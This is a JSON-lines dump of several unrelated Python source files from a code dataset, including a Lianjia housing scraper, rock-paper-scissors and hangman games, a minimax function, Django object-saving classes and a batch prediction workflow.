results.extend(trans_spider(url_page))\n #if len(results) > 100:\n #return results\n\n print('current transition %s %s %s' % (len(results), area[0], sub_area[1]))\n\n return results\n\n\nif __name__ == '__main__':\n login()\n districts = district_spider()\n\n btrans = True\n bstock = True\n bcommunity = True\n # 成交\n if btrans:\n transitions = do_trans_spider(districts)\n df_transitions = pd.DataFrame(transitions, columns=Transitions_Info_Col)\n df_transitions.to_csv('transitions_%s.csv' % time.strftime(\"%Y_%m_%d_%H_%M_%S\", time.localtime()))\n\n #在售\n if bstock:\n properties = do_property_spider(districts)\n df_properties = pd.DataFrame(properties, columns=Properties_Info_Col)\n df_properties.to_csv('properties_%s.csv' % time.strftime(\"%Y_%m_%d_%H_%M_%S\", time.localtime()))\n\n #小区\n if bcommunity:\n communities = do_xiaoqu_spider(districts)\n df_communities = pd.DataFrame(communities, columns=Communities_Info_Col)\n df_communities.to_csv('communities_%s.csv' % time.strftime(\"%Y_%m_%d_%H_%M_%S\", time.localtime()))\n\n\n","sub_path":"spider4lianjia.py","file_name":"spider4lianjia.py","file_ext":"py","file_size_in_byte":14640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"640435219","text":"def minimax(arr, depth):\r\n if depth == 1:\r\n return print(arr[0])\r\n else:\r\n winners = []\r\n\r\n if depth % 2 == 0:\r\n for i in range(0, len(arr), 2):\r\n winners.append(max(arr[i], arr[i + 1]))\r\n else:\r\n for i in range(0, len(arr), 2):\r\n winners.append(min(arr[i], arr[i + 1]))\r\n\r\n depth -= 1\r\n minimax(winners, depth)\r\n","sub_path":"minimax.py","file_name":"minimax.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"334094319","text":"# coding:utf-8\n\n\nimport threadpool, time, os\nfrom multiprocessing import cpu_count\n\nall_line_dict = {}\n\nwith open('/home/wangxiaopeng/replaced_220341_tags.dat') as fr:\n for line in fr.readlines():\n a = set()\n pic_labels = line.strip().split('__^__')\n for label in pic_labels[1].strip().split(' '):\n if len(label) > 0:\n a.add(label)\n all_line_dict[pic_labels[0]] = a\n\nkey_list = all_line_dict.keys()\n\n\ndef write_files(i):\n print ('start write:', i, '..........')\n\n fw = open('/home/wangxiaopeng/operate/mid_files/' + str(i) + '_mid_file.txt', 'w')\n i_key = key_list[i]\n i_set = all_line_dict[i_key]\n for j in key_list[i + 1:]:\n j_set = all_line_dict[j]\n if len(j_set.intersection(i_set)) == 0:\n fw.write(i_key + ' ' + j + '\\n')\n fw.flush()\n fw.close()\n print ('save :', i, 'over !!!!!!!!!!!!')\n\n\nif __name__ == '__main__':#GPU 机器写到了第18138和剩余的图片比较所得的交集,下次该 i = 18139 !!!!\n\n i_list = [[i] for i in range(0, len(key_list))]\n\n n_list = [None for i in range(len(i_list))]\n\n pool = threadpool.ThreadPool(cpu_count())\n requests = threadpool.makeRequests(write_files, zip(i_list, n_list))\n [pool.putRequest(req) for req in requests]\n pool.wait()\n print ('all of intersection processes excute over !!!!!')\n","sub_path":"tagsquantify/cnn/intersect_0.py","file_name":"intersect_0.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"444029499","text":"# A simple logic exercise: rock, paper, scissors examples using loops \n# (and nested conditionals)\n\ndef paperRockScissors():\n # I would say that this is a longer way than most other ways, but \n # it shows exactly what's happening at every step of the way \n # and it is kind of dummy proof\n\n print(\"Your choices are: \\nrock\\npaper\\nscissors\")\n player1 = input(\"(enter Player 1's choice): \").lower()\n for i in range (20):\n print(\" NO CHEATING \")\n player2 = input(\"(enter Player 2's choice): \").lower\n print(\"SHOOT!\")\n\n # Checks if player 1 entered a correct value for the game\n if player1 == \"rock\" or player1 == \"paper\" or player1 == \"scissors\":\n # Checks if player 2 entered a correct value for the game\n if player2 == \"rock\" or player2 == \"paper\" or player2 == \"scissors\":\n # Checks if they tied first.\n if player1 == player2:\n print(\"you tied! Try again\")\n return\n # Logically, it makes sense to me that you would put everything else inside...an else.\n else:\n if player1 == \"scissors\":\n if player2 == \"rock\":\n print(\"player 2 wins!\")\n return\n else:\n print(\"player 1 wins!\")\n return\n elif player1 == \"paper\":\n if player2 == \"scissors\":\n print(\"player 2 wins!\")\n return\n else:\n print(\"player 1 wins!\")\n return\n elif player1 == \"rock\":\n if player2 == \"paper\":\n print(\"player 2 wins!\")\n return\n else:\n print(\"player 1 wins!\")\n return\n else:\n print(\"player 2 entered an invalid option, try again\")\n return\n else:\n print(\"player 1 or player 2 entered an invalid option, try again\")\n return\n \ndef paperRockScissorsShort():\n # This is probably one of the shortest ways to do this, but\n # you're mostly just going to be hoping the users don't enter something\n # that shouldn't be there. I.E. \"Pikachu\"\n # Yes, pikachu probably beats paper, and loses to rock and maybe scissors?\n\n p1 = input(\"Player 1: rock, paper, or scissors \")\n p2 = input(\"Player 2: rock, paper, or scissors \")\n \n # Checks p1 against p2 every time and if p1 doesn't win in any of these conditionals,\n # it must mean that p2 is the winner...right? It's kind of an honor system.\n if p1 == p2:\n print(\"Draw\")\n elif p1 == \"rock\" and p2 == \"scissors\":\n print(\"p1 wins\")\n elif p1 == \"paper\" and p2 == \"rock\":\n print(\"p1 wins\")\n elif p1 == \"scissors\" and p2 == \"paper\":\n print(\"p1 wins\")\n else:\n print(\"p2 wins\")\n\ndef computerVsMan():\n import random\n # And finally, it's time for the final showdown of man vs machine.\n # Unfortunately, it's a rock, paper, scissors fight to the end.\n # Good luck. \n # This is using the same code from the first iteration, with random import.\n\n print(\"Your choices are: \\nrock\\npaper\\nscissors\\n\")\n print(\"The robot awaits...\\n\")\n player1 = input(\"enter your choice: \").lower()\n\n player2 = random.choice([\"rock\", \"paper\", \"scissors\"])\n\n print(\"SHOOT!\")\n print(f\"The robot chose {player2}\\n\")\n\n # Checks if player 1 entered a correct value for the game\n if player1 == \"rock\" or player1 == \"paper\" or player1 == \"scissors\":\n # Checks if player 2 entered a correct value for the game\n if player2 == \"rock\" or player2 == \"paper\" or player2 == \"scissors\":\n # Checks if they tied first.\n if player1 == player2:\n print(\"you tied! Try again to save humanity\")\n return\n # Logically, it makes sense to me that you would put everything else inside...an else.\n else:\n if player1 == \"scissors\":\n if player2 == \"rock\":\n print(\"robot wins!\")\n return\n else:\n print(\"player 1 wins!\")\n return\n elif player1 == \"paper\":\n if player2 == \"scissors\":\n print(\"robot wins!\")\n return\n else:\n print(\"player 1 wins!\")\n return\n elif player1 == \"rock\":\n if player2 == \"paper\":\n print(\"robot wins!\")\n return\n else:\n print(\"player 1 wins!\")\n return\n else:\n print(\"player 1 entered an invalid option, try again\")\n return\n\n# paperRockScissors()\n# paperRockScissorsShort()\ncomputerVsMan()","sub_path":"rock_paper_scissor.py","file_name":"rock_paper_scissor.py","file_ext":"py","file_size_in_byte":5018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"405101250","text":"import logging\n\nlog = logging.getLogger(__package__)\nhandler = logging.StreamHandler()\n\nformatter = logging.Formatter(\n fmt='[%(name)s] [%(threadName)s] %(asctime)s %(levelname)s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S'\n)\nhandler.setFormatter(formatter)\nlog.addHandler(handler)\n\n\ndef enable_debug():\n log.setLevel(logging.DEBUG)\n\n\n# enable_debug()\n","sub_path":"log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"263417974","text":"import json\nimport os\n\nfrom rv.utils.files import (\n download_if_needed, MyTemporaryDirectory)\nfrom rv.utils.batch import _batch_submit\nfrom rv.detection.commands.settings import temp_root_dir\n\n\ndef make_predict_array_cmd(inference_graph_uri, label_map_uri, projects_uri):\n return 'python -m rv.detection.run predict_array {} {} {}'.format(\n inference_graph_uri, label_map_uri, projects_uri)\n\n\ndef make_merge_predictions_cmd(projects_uri, output_uri):\n return 'python -m rv.detection.run merge_predictions {} {}'.format(\n projects_uri, output_uri)\n\n\ndef parallel_predict():\n inference_graph_uri = \\\n 's3://raster-vision-lf-dev/detection/trained-models/cowc-potsdam/30cm/inference-graph.pb'\n label_map_uri = \\\n 's3://raster-vision-lf-dev/detection/configs/label-maps/cowc.pbtxt'\n projects_uri = \\\n 's3://raster-vision-lf-dev/detection/configs/projects/predict/cowc-potsdam/remote/30cm-test.json'\n output_uri = \\\n 's3://raster-vision-lf-dev/detection/predictions/cowc-potsdam/30cm-test/all.json'\n\n branch_name = 'lf/rfint'\n attempts = 1\n cpu = True\n\n prefix = temp_root_dir\n temp_dir = os.path.join(prefix, 'parallel-predict')\n with MyTemporaryDirectory(temp_dir, prefix) as temp_dir:\n projects_path = download_if_needed(projects_uri, temp_dir)\n with open(projects_path, 'r') as projects_file:\n projects = json.load(projects_file)\n nb_projects = len(projects)\n command = make_predict_array_cmd(\n inference_graph_uri, label_map_uri, projects_uri)\n predict_job_id = _batch_submit(\n branch_name, command, attempts=attempts, cpu=cpu,\n array_size=nb_projects)\n\n command = make_merge_predictions_cmd(\n projects_uri, output_uri)\n _batch_submit(\n branch_name, command, attempts=attempts, cpu=cpu,\n parent_job_ids=[predict_job_id])\n\n\nif __name__ == '__main__':\n parallel_predict()\n","sub_path":"src/workflows/detection/cowc_potsdam/parallel_predict.py","file_name":"parallel_predict.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"569287824","text":"import os\n\nimport web\n\ntry:\n import pygame\nexcept ImportError:\n os.system('pip install pygame')\nimport string\nimport sys\nimport webbrowser\n\nfrom web import *\nfrom hangman import *\nfrom tkinter import *\nfrom tkinter.filedialog import *\n\n\nLIGHT_GREY = (214, 195, 191)\nGREY = (122, 117, 116)\nLIGHT_BLACK = (41, 36, 35)\nDARK_BLUE = (10, 7, 61)\nDARK_GREEN = (0, 28, 9)\nORANGE_RED = (179, 36, 7)\nWHITE = (255, 255, 255)\nGREEN =(38, 156, 14)\nRED = (255, 0, 0)\nBG_COLOUR = (213, 221, 232)\nBLACK = (0,0,0)\npygame.init()\nFONT_80 = pygame.font.SysFont(None, 80)\nFONT_200 = pygame.font.SysFont(None, 200)\nFONT_60 = pygame.font.SysFont(None, 60)\nFONT_70 = pygame.font.SysFont(None, 70)\nFONT_100 = pygame.font.SysFont(None, 100)\nFONT_180 = pygame.font.SysFont(None, 180)\nFONT_30 = pygame.font.SysFont(None, 30)\n\n\nscreen = pygame.display.set_mode([1280, 720])\npygame.display.set_caption('HANGMAN')\nicon = pygame.image.load(\"assets/Hangman.ico\")\npygame.display.set_icon(icon)\n\ndef word_enter():\n showError = False\n def start(text):\n if len(text) >60:\n\n label2.config(text=\"Too long\")\n label2.pack(anchor='center')\n return False\n if all([True if i in Hangman.allowed else False for i in text]) and any([True if i in string.ascii_letters else False for i in text]):\n root.destroy()\n main_window(text)\n else:\n label2.config(text=\"Choose a different word\")\n label2.pack(anchor='center')\n \n root = Tk()\n root.title(\"Word Select\")\n root.geometry(\"150x100\")\n root.resizable(False, False)\n\n label = Label(root, text=\"Type a Word/Phrase\")\n label2 = Label(root)\n entry = Entry(root)\n button = Button(root, text=\"Start\",command = lambda: start(entry.get()))\n\n\n label.pack(anchor='n')\n entry.pack(anchor='n')\n button.pack(anchor='center')\n root.mainloop()\n\n\ndef main_window(text=None, dict_name = None):\n greyarr = [[40, 200, 80, 80], [140, 200, 80, 80], [240, 200, 80, 80], [340, 200, 80, 80], [440, 200, 80, 80],\n [540, 200, 80, 80], [40, 300, 80, 80], [140, 300, 80, 80], [240, 300, 80, 80], [340, 300, 80, 80],\n [440, 300, 80, 80], [540, 300, 80, 80], [40, 400, 80, 80], [140, 400, 80, 80], [240, 400, 80, 80],\n [340, 400, 80, 80], [440, 400, 80, 80], [540, 400, 80, 80], [40, 500, 80, 80], [140, 500, 80, 80],\n [240, 500, 80, 80], [340, 500, 80, 80], [440, 500, 80, 80], [540, 500, 80, 80], [40, 600, 80, 80],\n [140, 600, 80, 80]]\n color1arr = [[45, 205, 70, 70], [145, 205, 70, 70], [245, 205, 70, 70], [345, 205, 70, 70], [445, 205, 70, 70],\n [545, 205, 70, 70], [45, 305, 70, 70], [145, 305, 70, 70], [245, 305, 70, 70], [345, 305, 70, 70],\n [445, 305, 70, 70], [545, 305, 70, 70], [45, 405, 70, 70], [145, 405, 70, 70], [245, 405, 70, 70],\n [345, 405, 70, 70], [445, 405, 70, 70], [545, 405, 70, 70], [45, 505, 70, 70], [145, 505, 70, 70],\n [245, 505, 70, 70], [345, 505, 70, 70], [445, 505, 70, 70], [545, 505, 70, 70], [45, 605, 70, 70],\n [145, 605, 70, 70]]\n textarr = [(60, 215), (160, 215), (260, 215), (360, 215), (460, 215), (560, 215), (60, 315), (160, 315), (270, 315),\n (360, 315), (460, 315), (560, 315), (60, 415), (160, 415), (260, 415), (360, 415), (460, 415),\n (560, 415), (60, 515), (160, 515), (260, 515), (360, 515), (455, 515), (560, 515), (60, 615), (164, 615)]\n bounds = [[40, 200, 120, 280], [140, 200, 220, 280], [240, 200, 320, 280], [340, 200, 420, 280],\n [440, 200, 520, 280], [540, 200, 620, 280], [40, 300, 120, 380], [140, 300, 220, 380],\n [240, 300, 320, 380], [340, 300, 420, 380], [440, 300, 520, 380], [540, 300, 620, 380],\n [40, 400, 120, 480], [140, 400, 220, 480], [240, 400, 320, 480], [340, 400, 420, 480],\n [440, 400, 520, 480], [540, 400, 620, 480], [40, 500, 120, 580], [140, 500, 220, 580],\n [240, 500, 320, 580], [340, 500, 420, 580], [440, 500, 520, 580], [540, 500, 620, 580],\n [40, 600, 120, 680], [140, 600, 220, 680]]\n\n alphabet = string.ascii_uppercase\n running = True\n if text:\n game = Hangman(string=text)\n else:\n game = Hangman(dictionary=dict_name)\n hint_used = False\n while running:\n mx, my = pygame.mouse.get_pos()\n\n if len(game.guess_wrong) >= 10:\n running = False\n loss_screen(game)\n\n if game.check_win():\n running = False\n win_screen(game)\n\n\n curLetters = list(alphabet)\n\n screen.fill(BG_COLOUR)\n\n try:\n image = pygame.image.load(f'assets/{len(game.guess_wrong)}.png')\n screen.blit(image, (800,100))\n except FileNotFoundError:\n pass\n\n\n if len(game.dis) <=30:\n toGuess = FONT_70.render(\"\".join(i + \" \" for i in game.dis), True, LIGHT_BLACK)\n screen.blit(toGuess, (20, 20))\n elif len(game.dis) >30 and len(game.dis) <=60:\n if game.string[30]!=\" \" and game.string[29]!=\" \":\n msg = \"\".join(i + \" \" for i in game.dis[:30])+\"-\"\n else:\n msg = \"\".join(i + \" \" for i in game.dis[:30])\n toGuess = FONT_70.render(msg, True, LIGHT_BLACK)\n screen.blit(toGuess, (20, 20))\n\n msg = \"\".join(i + \" \" for i in game.dis[30:])\n toGuess = FONT_70.render(msg, True, LIGHT_BLACK)\n screen.blit(toGuess, (20, 100))\n\n left = FONT_180.render(str(10 - len(game.guess_wrong)), True, LIGHT_BLACK)\n screen.blit(left, (1120, 580))\n\n guessesLeft = FONT_80.render(\"Guesses Left:\", True, LIGHT_BLACK)\n screen.blit(guessesLeft, (740, 620))\n\n for i in range(len(greyarr)):\n pygame.draw.rect(screen, GREY, greyarr[i])\n pygame.draw.rect(screen, LIGHT_GREY, color1arr[i])\n img = FONT_80.render(curLetters[0], True, LIGHT_BLACK)\n\n curLetters.pop(0)\n screen.blit(img, textarr[i])\n\n\n if not hint_used:\n hint = pygame.Rect([450,600,160,80])\n pygame.draw.rect(screen, GREY, hint)\n pygame.draw.rect(screen, LIGHT_GREY, [455,605,150,70])\n img = FONT_70.render(\"HINT\", True, BLACK)\n screen.blit(img, (470,615))\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n running = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n\n if hint.collidepoint((mx,my)) and not hint_used:\n hint_used = True\n index = alphabet.find(game.hint())\n greyarr.pop(index)\n color1arr.pop(index)\n textarr.pop(index)\n bounds.pop(index)\n alphabet = alphabet[:index] + alphabet[index + 1:]\n\n for index, bound in enumerate(bounds):\n if mx >= bound[0] and mx <= bound[2] and my >= bound[1] and my <= bound[3]:\n game.checkLetter(alphabet[index])\n\n greyarr.pop(index)\n color1arr.pop(index)\n textarr.pop(index)\n bounds.pop(index)\n alphabet = alphabet[:index] + alphabet[index + 1:]\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n main_menu()\n\n pygame.display.update()\n\n\ndef dictSelect():\n root =Tk()\n root.withdraw()\n name = dict_name=askopenfilename()\n root.destroy()\n if name and name != \"()\":\n main_window(dict_name=name)\n else:\n main_menu()\n\n\ndef loss_screen(game_obj):\n\n running = True\n while running:\n mx, my = pygame.mouse.get_pos()\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n running = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n if back.collidepoint((mx, my)):\n running = False\n main_menu()\n screen.fill(BG_COLOUR)\n\n img = FONT_180.render(\"You Lost!\", True, RED)\n screen.blit(img, (350,50))\n\n text = \"The word was:\"\n img = FONT_70.render(text, True, LIGHT_BLACK)\n location = img.get_rect(center=screen.get_rect().center)\n location.move_ip(0, -150)\n screen.blit(img, location)\n\n\n text = game_obj.string\n if len(text) <=30:\n img = FONT_70.render(text, True, LIGHT_BLACK)\n location = img.get_rect(center=screen.get_rect().center)\n location.move_ip(0, -100)\n screen.blit(img, location)\n\n elif len(text) >30 and len(text) <=60:\n if text[30]!=\" \" and text[29]!=\" \":\n img = FONT_70.render(text[:30]+'-', True, LIGHT_BLACK)\n location = img.get_rect(center=screen.get_rect().center)\n location.move_ip(0, -100)\n screen.blit(img, location)\n\n img = FONT_70.render(text[30:], True, LIGHT_BLACK)\n location = img.get_rect(center=screen.get_rect().center)\n location.move_ip(0, -30)\n screen.blit(img, location)\n else:\n img = FONT_70.render(text[:30], True, LIGHT_BLACK)\n location = img.get_rect(center=screen.get_rect().center)\n location.move_ip(0, -100)\n screen.blit(img, location)\n\n img = FONT_70.render(text[30:], True, LIGHT_BLACK)\n location = img.get_rect(center=screen.get_rect().center)\n location.move_ip(0, -30)\n screen.blit(img, location)\n\n back = pygame.Rect(0, 0, 300, 130)\n back.center = (640, 550)\n front = pygame.Rect(0, 0, 290, 120)\n front.center = (640, 550)\n\n pygame.draw.rect(screen, LIGHT_BLACK, back)\n pygame.draw.rect(screen, BG_COLOUR, front)\n ToMenu = FONT_100.render(\"To Menu\", True, LIGHT_BLACK)\n TMlocation = ToMenu.get_rect(center=screen.get_rect().center)\n TMlocation.move_ip(0, 190)\n screen.blit(ToMenu, TMlocation)\n\n if back.collidepoint((mx, my)):\n pygame.draw.rect(screen, LIGHT_BLACK, front)\n ToMenu = FONT_100.render(\"To Menu\", True, WHITE)\n TMlocation = ToMenu.get_rect(center=screen.get_rect().center)\n TMlocation.move_ip(0, 190)\n screen.blit(ToMenu, TMlocation)\n\n\n\n image = pygame.image.load('assets/10.png')\n screen.blit(image, (900,350))\n \n img = FONT_60.render(\"R.I.P.\", True, RED)\n screen.blit(img, (1030, 665))\n\n pygame.display.update()\n\n\n\ndef win_screen(game_obj):\n running = True\n while running:\n mx, my = pygame.mouse.get_pos()\n\n\n screen.fill(BG_COLOUR)\n\n img = FONT_180.render(\"You Won!\", True, GREEN)\n screen.blit(img, (350, 50))\n\n img = FONT_70.render(\"Well done for guessing:\", True, LIGHT_BLACK)\n location = img.get_rect(center=screen.get_rect().center)\n location.move_ip(0, -150)\n screen.blit(img, location)\n\n text = game_obj.string\n if len(text) <= 30:\n img = FONT_70.render(text, True, LIGHT_BLACK)\n location = img.get_rect(center=screen.get_rect().center)\n location.move_ip(0, -80)\n screen.blit(img, location)\n\n elif len(text) > 30 and len(text) <= 60:\n if text[30] != \" \" and text[29] != \" \":\n img = FONT_70.render(text[:30] + '-', True, LIGHT_BLACK)\n location = img.get_rect(center=screen.get_rect().center)\n location.move_ip(0, -80)\n screen.blit(img, location)\n\n img = FONT_70.render(text[30:], True, LIGHT_BLACK)\n location = img.get_rect(center=screen.get_rect().center)\n location.move_ip(0, -30)\n screen.blit(img, location)\n else:\n img = FONT_70.render(text[:30], True, LIGHT_BLACK)\n location = img.get_rect(center=screen.get_rect().center)\n location.move_ip(0, -80)\n screen.blit(img, location)\n\n img = FONT_70.render(text[30:], True, LIGHT_BLACK)\n location = img.get_rect(center=screen.get_rect().center)\n location.move_ip(0, -30)\n screen.blit(img, location)\n\n\n back = pygame.Rect(0, 0, 300, 130)\n back.center = (640, 550)\n front = pygame.Rect(0, 0, 290, 120)\n front.center = (640, 550)\n\n pygame.draw.rect(screen, LIGHT_BLACK, back)\n pygame.draw.rect(screen, BG_COLOUR, front)\n ToMenu = FONT_100.render(\"To Menu\", True, LIGHT_BLACK)\n TMlocation = ToMenu.get_rect(center=screen.get_rect().center)\n TMlocation.move_ip(0, 190)\n screen.blit(ToMenu, TMlocation)\n\n if back.collidepoint((mx,my)):\n pygame.draw.rect(screen, LIGHT_BLACK, front)\n ToMenu = FONT_100.render(\"To Menu\", True, WHITE)\n TMlocation = ToMenu.get_rect(center = screen.get_rect().center)\n TMlocation.move_ip(0,190)\n screen.blit(ToMenu, TMlocation)\n\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n running = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n if back.collidepoint((mx, my)):\n running = False\n main_menu()\n pygame.display.update()\n\n running = True\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n running = False\n screen.fill(BG_COLOUR)\n\n pygame.display.update()\n\n\ndef add_dict():\n root = Tk()\n icon = PhotoImage(\"assets/Hangman.ico\")\n root.iconbitmap(False, icon)\n root.wm_iconbitmap(bitmap = \"assets/Hangman.ico\")\n root.title(\"Add dictionary\")\n\n l1 = Label(root, text= \"Input a vocabulary.com/lists URL\")\n l1.pack()\n\n e1 = Entry(root)\n e1.pack()\n e1.insert(0, 'Example: www.vocabulary.com/lists/111111')\n e1.configure(state=DISABLED)\n def on_click(event):\n e1.configure(state=NORMAL)\n e1.delete(0, END)\n\n e1.unbind('', on_click_id)\n\n on_click_id = e1.bind('', on_click)\n\n def save(url):\n if web.pull(url):\n root.destroy()\n b1 = Button(root, text =\"Save\", command=lambda: save(e1.get()))\n b1.pack()\n root.mainloop()\n\n\ndef main_menu():\n running = True\n while running:\n mx, my = pygame.mouse.get_pos()\n\n screen.fill(BG_COLOUR)\n\n gitlink = FONT_30.render(\"Made By: github.com/AlexDavicenko\", True, LIGHT_BLACK)\n gitlinkRect = gitlink.get_rect()\n gitlinkRect.move_ip(10, 690)\n screen.blit(gitlink, (10, 690))\n\n title = FONT_200.render('HANGMAN', True, ORANGE_RED)\n titleRect = title.get_rect()\n titleRect.move_ip(250, 20)\n if titleRect.collidepoint((mx,my)):\n title = FONT_200.render('HANGMAN', True, RED)\n screen.blit(title, (250, 20))\n\n optionSP = pygame.Rect(0,0,320,150)\n optionMP = pygame.Rect(0,0,320,150)\n optionAD = pygame.Rect(0,0,320,150)\n\n optionSPw = pygame.Rect(0,0,310,140)\n optionMPw = pygame.Rect(0,0,310,140)\n optionADw = pygame.Rect(0,0,310,140)\n\n optionSP.center = (640,240)\n optionMP.center = (640,420)\n optionAD.center = (640,600)\n optionSPw.center = (640,240)\n optionMPw.center = (640,420)\n optionADw.center = (640,600)\n\n pygame.draw.rect(screen, LIGHT_BLACK, optionSP)\n pygame.draw.rect(screen, LIGHT_BLACK, optionMP)\n pygame.draw.rect(screen, LIGHT_BLACK, optionAD)\n pygame.draw.rect(screen, BG_COLOUR, optionSPw)\n pygame.draw.rect(screen, BG_COLOUR, optionMPw)\n pygame.draw.rect(screen, BG_COLOUR, optionADw)\n\n\n\n\n\n SPcaption = FONT_60.render(\"Singleplayer\", True, LIGHT_BLACK)\n SPlocation = SPcaption.get_rect(center = screen.get_rect().center)\n SPlocation.move_ip(0,-120)\n screen.blit(SPcaption, SPlocation)\n\n MPcaption = FONT_60.render(\"Multiplayer\", True, LIGHT_BLACK)\n MPlocation = MPcaption.get_rect(center = screen.get_rect().center)\n MPlocation.move_ip(0,60)\n screen.blit(MPcaption, MPlocation)\n\n ADcaption = FONT_60.render(\"Add Dictionary\", True, LIGHT_BLACK)\n ADlocation = ADcaption.get_rect(center=screen.get_rect().center)\n ADlocation.move_ip(0, 240)\n screen.blit(ADcaption, ADlocation)\n\n\n if optionSP.collidepoint((mx,my)):\n pygame.draw.rect(screen, LIGHT_BLACK, optionSPw)\n SPcaption = FONT_60.render(\"Singleplayer\", True, WHITE)\n SPlocation = SPcaption.get_rect(center = screen.get_rect().center)\n SPlocation.move_ip(0,-120)\n screen.blit(SPcaption, SPlocation)\n \n\n\n if optionMP.collidepoint((mx,my)):\n pygame.draw.rect(screen, LIGHT_BLACK, optionMPw)\n MPcaption = FONT_60.render(\"Multiplayer\", True, WHITE)\n MPlocation = MPcaption.get_rect(center = screen.get_rect().center)\n MPlocation.move_ip(0,60)\n screen.blit(MPcaption, MPlocation)\n\n if optionAD.collidepoint((mx,my)):\n pygame.draw.rect(screen, LIGHT_BLACK, optionADw)\n ADcaption = FONT_60.render(\"Add Dictionary\", True, WHITE)\n ADlocation = ADcaption.get_rect(center = screen.get_rect().center)\n ADlocation.move_ip(0,240)\n screen.blit(ADcaption, ADlocation)\n\n\n\n \n\n\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n running = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n if optionSP.collidepoint((mx, my)):\n dictSelect()\n if optionMP.collidepoint((mx, my)):\n word_enter()\n if optionAD.collidepoint((mx, my)):\n add_dict()\n if gitlinkRect.collidepoint((mx, my)):\n webbrowser.open('http://github.com/AlexDavicenko')\n\n pygame.display.update()\nmain_menu()","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":18467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"291300801","text":"import datetime\nimport os\n\nfrom django.utils import timezone\nfrom tagging.utils import parse_tag_input\nfrom tzlocal import get_localzone\n\nfrom obj_sys import obj_tools\nfrom obj_sys.models_ufs_obj import UfsObj\nfrom tagging.models import Tag\n\n\nclass ObjectIsNotAssigned(Exception):\n pass\n\n\nclass UfsObjSaverBase(object):\n def __init__(self, user):\n super(UfsObjSaverBase, self).__init__()\n self.user = user\n self.source = UfsObj.SOURCE_WEB_POST\n self.last_modified = None\n self.parent = None\n self.create_param = None\n self.obj = None\n self.ufs_url = None\n self.full_path = None\n self.tag_app = None\n\n def filter_or_create(self):\n obj_filter = self.get_filter()\n if not obj_filter.exists():\n self.obj, is_created = self.get_or_create()\n else:\n self.obj = obj_filter[0]\n return obj_filter\n\n def get_or_create(self):\n obj_filter = self.get_filter()\n if obj_filter.exists():\n self.obj = obj_filter[0]\n return self.obj, False\n self.create_param = ({\"ufs_url\": self.ufs_url, \"parent\": self.parent, \"user\": self.user,\n \"full_path\": self.full_path, \"ufs_obj_type\": self.ufs_obj_type,\n \"source\": self.source})\n if not (self.last_modified is None):\n self.create_param[\"last_modified\"] = self.last_modified\n self.obj, is_created = UfsObj.objects.get_or_create(**self.create_param)\n return self.obj, is_created\n\n def append_tags(self, tags):\n if self.obj is None:\n raise ObjectIsNotAssigned\n for tag_name in parse_tag_input(tags):\n Tag.objects.add_tag(self.obj, tag_name, tag_app=self.tag_app)\n\n def add_description(self, description):\n self.obj.descriptions.add(description)\n # self.obj.save()\n\n\nclass UfsLocalObjSaver(UfsObjSaverBase):\n def __init__(self, user, ufs_obj_type=UfsObj.TYPE_UFS_OBJ):\n super(UfsLocalObjSaver, self).__init__(user)\n self.ufs_obj_type = ufs_obj_type\n\n def init_with_qt_url(self, qt_file_url):\n self.init_with_full_path(obj_tools.get_full_path_for_local_os(qt_file_url))\n\n def init_with_full_path(self, full_path):\n self.full_path = full_path\n self.ufs_url = obj_tools.get_ufs_url_for_local_path(self.full_path)\n tz = get_localzone()\n self.last_modified = tz.localize(datetime.datetime.fromtimestamp(os.path.getmtime(self.full_path)))\n\n def get_filter(self):\n return UfsObj.objects.filter(full_path=self.full_path, user=self.user)\n\n def get_or_create(self):\n obj, is_created = super(UfsLocalObjSaver, self).get_or_create()\n if os.path.isdir(self.full_path):\n self.__append_folder_tag()\n return obj, is_created\n\n def __append_folder_tag(self):\n self.append_tags(\"folder\")\n\n def update_from_local_path(self):\n self.get_filter().update(last_modified=self.last_modified)\n\n @staticmethod\n def get_full_path_from_qt_url(url):\n return url.replace(\"file:///\", \"\")\n\n @staticmethod\n def get_qt_url_from_full_path(full_path):\n return \"file:///%s\" % full_path\n\n\nclass UfsUrlObj(UfsObjSaverBase):\n def __init__(self, web_url, user, ufs_obj_type=UfsObj.TYPE_UFS_OBJ):\n super(UfsUrlObj, self).__init__(user)\n self.full_path = None\n self.ufs_url = web_url\n self.ufs_obj_type = ufs_obj_type\n\n def get_filter(self):\n return UfsObj.objects.filter(ufs_url=self.ufs_url, user=self.user)\n","sub_path":"obj_sys/ufs_local_obj.py","file_name":"ufs_local_obj.py","file_ext":"py","file_size_in_byte":3593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"600615824","text":"\r\n\"\"\"\r\nCreated on Sun Aug 25 21:02:56 2019\r\n\r\n@author: Robin Devasagayam Sebastian\r\n\"\"\"\r\n\r\n\r\nfrom fuzzywuzzy import process\r\n\r\nwith open(\"D:/Data/Projects/Fuzzy String Matching/cities.csv\", \"r\") as 